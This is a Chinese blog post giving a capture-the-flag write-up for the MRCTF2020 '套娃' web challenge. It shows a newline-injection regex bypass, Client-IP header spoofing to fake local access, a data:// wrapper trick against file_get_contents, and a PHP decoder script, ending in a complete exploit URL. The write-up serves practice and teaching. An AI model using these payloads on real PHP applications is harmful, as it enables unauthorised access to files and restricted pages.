BUUCTF-[MRCTF2020]套娃 wp

查看源码发现提示

 

 使用b u p t%0a换行污染绕过,发现secrettw.php

 

 

进入secrettw.php后发现需要本地登录,使用Client-IP绕过

 

 

 

 

 

 发现jsfuck,解密后为Post me Merak,于是在包中添加一个Merak参数,得到源码

 

 我们可以使用data://伪协议绕过file_get_contents函数,并且写一个脚本解密change函数

 

脚本:

<?php

function change($v){

    $v = base64_decode($v);

    $re = '';

    for($i=0;$i<strlen($v);$i++){

        $re .= chr ( ord($v[$i]) + $i*2 );

    }

    return $re;

} 

function dechange($v){

$re = '';

for($i=0;$i<strlen($v);$i++){

        $re .= chr ( ord($v[$i]) - $i*2 );

    }

echo base64_encode($re)."<br>";

return $re;

}

$a = dechange('flag.php');

?>

 

运行脚本后得到ZmpdYSZmXGI=

 

paload:7849b05d-fdf9-4e38-ae4f-347846f85d87.node3.buuoj.cn/secrettw.php?2333=data://text/plain,todat is a happy day&file=ZmpdYSZmXGI=,再使用Client-ip修改一下ip查看源码可得flag

 

 

参考:

https://www.ctfwp.com/官方赛事题/2020MRCTF

 

 

 

 

posted @ 2020-09-12 15:14  Yhck  阅读(285)  评论(0编辑  收藏  举报